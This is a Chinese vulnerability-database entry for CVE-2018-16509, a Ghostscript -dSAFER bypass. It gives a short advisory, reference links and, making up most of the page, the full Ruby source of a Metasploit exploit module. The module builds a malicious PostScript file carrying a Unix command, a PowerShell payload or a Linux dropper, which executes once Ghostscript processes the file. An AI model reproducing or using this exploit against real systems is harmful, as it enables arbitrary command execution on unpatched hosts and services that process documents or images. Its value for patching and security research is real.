Artifex Ghostscript 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1294770 漏洞类型 权限许可和访问控制问题
发布时间 2018-09-10 更新时间 2019-10-23
CVE编号 CVE-2018-16509 CNNVD-ID CNNVD-201809-163
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/45369
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201809-163
|漏洞详情
Artifex Ghostscript是美国Artifex Software公司的一款开源的PostScript(一种用于电子产业和桌面出版领域的页面描述语言和编程语言)解析器,它可显示Postscript文件以及在非Postscript打印机上打印Postscript文件。 Artifex Ghostscript 9.24之前版本中存在安全漏洞,该漏洞源于在处理/invalidaccess异常时,程序没有正确的检测‘restoration of privilege(权限恢复)’。攻击者可通过提交特制的PostScript利用该漏洞执行代码。
|漏洞EXP
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit

  Rank = ExcellentRanking

  PLACEHOLDER_STRING  = 'metasploit'
  PLACEHOLDER_COMMAND = 'echo vulnerable > /dev/tty'

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ghostscript Failed Restore Command Execution',
      'Description'    => %q{
        This module exploits a -dSAFER bypass in Ghostscript to execute
        arbitrary commands by handling a failed restore (grestore) in
        PostScript to disable LockSafetyParams and avoid invalidaccess.

        This vulnerability is reachable via libraries such as ImageMagick,
        and this module provides the latest vector for Ghostscript.

        For previous Ghostscript vectors, please see the following modules:
          exploit/unix/fileformat/ghostscript_type_confusion
          exploit/unix/fileformat/imagemagick_delegate
      },
      'Author'         => [
        'Tavis Ormandy', # Vuln discovery and exploit
        'wvu'            # Metasploit module
      ],
      'References'     => [
        ['CVE', '2018-16509'],
        ['URL', 'http://seclists.org/oss-sec/2018/q3/142'],
        ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1640']
      ],
      'DisclosureDate' => 'Aug 21 2018',
      'License'        => MSF_LICENSE,
      'Platform'       => ['unix', 'linux', 'win'],
      'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64],
      'Privileged'     => false,
      'Targets'        => [
        ['Unix (In-Memory)',
         'Platform'    => 'unix',
         'Arch'        => ARCH_CMD,
         'Type'        => :unix_memory,
         'Payload'     => {'Space' => 4089, 'DisableNops' => true} # 4096 total
        ],
        ['PowerShell (In-Memory)',
         'Platform'    => 'win',
         'Arch'        => [ARCH_X86, ARCH_X64],
         'Type'        => :psh_memory
        ],
        ['Linux (Dropper)',
         'Platform'    => 'linux',
         'Arch'        => [ARCH_X86, ARCH_X64],
         'Type'        => :linux_dropper
        ]
      ],
      'DefaultTarget'  => 0
    ))

    register_options([
      OptString.new('FILENAME', [true, 'Output file', 'msf.ps'])
    ])

    register_advanced_options([
      OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])
    ])
  end

  def exploit
    sploit = template

    # Replace our placeholder string with a random one
    sploit.sub!(PLACEHOLDER_STRING, Rex::Text.rand_text_alphanumeric(8..42))

    # Replace our test payload with the real one
    case target['Type']
    when :unix_memory
      sploit.sub!(PLACEHOLDER_COMMAND, payload.encoded)
    when :psh_memory
      psh = cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true)

      # XXX: Payload space applies to the payload, not the PSH command
      if psh.length > targets[0].payload_space
        fail_with(Failure::BadConfig, 'Please choose a smaller payload')
      end

      sploit.sub!(PLACEHOLDER_COMMAND, psh)
    when :linux_dropper
      cmdstager = generate_cmdstager(
        linemax: targets[0].payload_space,
        temp:    datastore['WritableDir']
      ).join(';')

      # XXX: Payload space applies to the payload, not the command stager
      if cmdstager.length > targets[0].payload_space
        fail_with(Failure::BadConfig, 'Please choose a smaller command stager')
      end

      sploit.sub!(PLACEHOLDER_COMMAND, cmdstager)
    end

    file_create(sploit)
  end

  def template
    File.read(File.join(
      Msf::Config.data_directory, 'exploits', 'ghostscript', 'msf.ps'
    ))
  end

end
|参考资料

来源:git.ghostscript.com

链接:http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=5516c614dc33662a2afdc377159f70218e67bde5


来源:git.ghostscript.com

链接:http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=78911a01b67d590b4a91afac2e8417360b934156


来源:git.ghostscript.com

链接:http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=79cccf641486a6595c43f1de1cd7ade696020a31


来源:seclists.org

链接:http://seclists.org/oss-sec/2018/q3/142


来源:www.artifex.com

链接:https://www.artifex.com/news/ghostscript-security-resolved/